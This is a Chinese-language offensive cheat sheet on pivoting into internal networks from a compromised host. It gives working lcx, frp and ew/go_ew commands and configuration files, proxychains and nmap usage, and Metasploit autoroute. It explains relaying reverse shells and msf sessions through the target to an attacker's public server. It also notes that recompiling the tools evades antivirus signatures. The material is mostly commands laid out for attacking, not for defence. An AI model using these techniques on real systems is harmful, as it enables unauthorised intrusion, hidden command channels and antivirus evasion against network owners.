端口转发
情景:
A:hacker
B:靶机
C:内网
| 方向 | 说明 |
|---|---|
| A - > B -> C 主动连接 |
B有防火墙时,需要把C端口转到B,B端口再转到A,访问A端口即可 B没有防火墙时,直接把C端口映射到B,访问B端口即可 |
| C -> B -> A 反弹shell |
C出网时,可以主动反弹到A的端口,A监听即可 C不出网时,只能反弹到B端口,再通过lcx转发到A端口,注意端口保持相同 |
lcx
LCX使用
在目标之上使用,及中间机器,用来打内网
A:攻击机
B:靶机
C:内网机器
注意:重新编译可以过特征码杀软
makefile+lcx.c编译:make
| 命令 | 说明 |
|---|---|
| lcx -tran 7788 内网ip 6379 | 把C的6379转发到B的7788 |
| lcx -tran 7789 公网ip 7789 | 端口需要设置为相同,否则msf无法上线 |
| lcx -slave 公网ip 443 内网ip 端口 | 把C的6379转发到A的7788 |
| lcx -listen 443 9005 | 监听A的443出口和9005入口 |
frp
frp(稳定性强)
只能配置入网,需要配合lcx配置出网
将 frps 及 frps.ini 放到具有公网 IP 的机器上,作为服务端
配置:
默认即可
使用:
frps.exe -c frps.ini
将 frpc 及 frpc.ini 放到处于内网环境的机器上(被控靶机),作为客户端
配置:
[common]
server_addr = x.x.x.x(服务器ip)
server_port = 7000(默认端口)
[ssh]
type = tcp
local_ip = 127.0.0.1(要攻击的内网ip)
local_port = 22(要攻击的内网端口)
remote_port = 6000(服务端ip)
使用:
frpc.exe reload -c frpc.ini 重新加载
注意:
使用msf时,需要使用lcx将靶机(中间机)的监听端口转发到msf的监听端口,两个端口号保持一致,msf监听靶机IP和端口即可
代理转发
分类
HTTP代理
SOCKS代理
Telnet代理
SSL代理
| 代理类型 | 说明 |
|---|---|
| 正向代理 | 内向外,服务器对流量进行转发 |
| 反向代理 | 外向内请求,根据域名区分,分发到不同内部网络 对外表现为多个域名为同一个ip地址 |
代理和vpn区别
代理:
传输层,tcp、udp、http、https流量
默认不包含终端
VPN:
路由层,icmp、dns、http、arp流量
默认包含终端
ew
sockts5代理工具
注:需要使用lcx将靶机的监听端口转发到msf的监听端口(端口号一致)
使用:
无防火墙:
配置代理:被控靶机ip:8080
访问内网ip、端口
ew -s ssocksd -l 8080 # 被控靶机
有防火墙:
配置代理:公网ip:1080
访问内网ip、端口
ew -s rcsocks -e 8888 -l 1080 # 公网服务器
ew -s rssocks -d 公网ip -e 8888 # 被控靶机
代理工具使用
windows:
proxifier
此处nmap扫描端口时不能使用ping的方式,所以需要使用Pn禁ping
nmap -Pn -sT 1.1.1.1
linux:
proxychains4-ng
安装:apt install proxychains4-ng
配置文件:/etc/proxychains.conf,文件末尾只配置一个有效代理
使用:proxychains4 命令
注意:部分软件会丢失参数,py文件最好使用python启动
补充
go版本ew(免杀,可重新编译)
| 位置 | 命令 |
|---|---|
| 公网服务器: | go_ew 8888 1080 |
| 被控靶机: | go_ew 公网ip:8888 |
msf的路由转发模块进行内网代理
run autoroute -s 192.168.11.0/24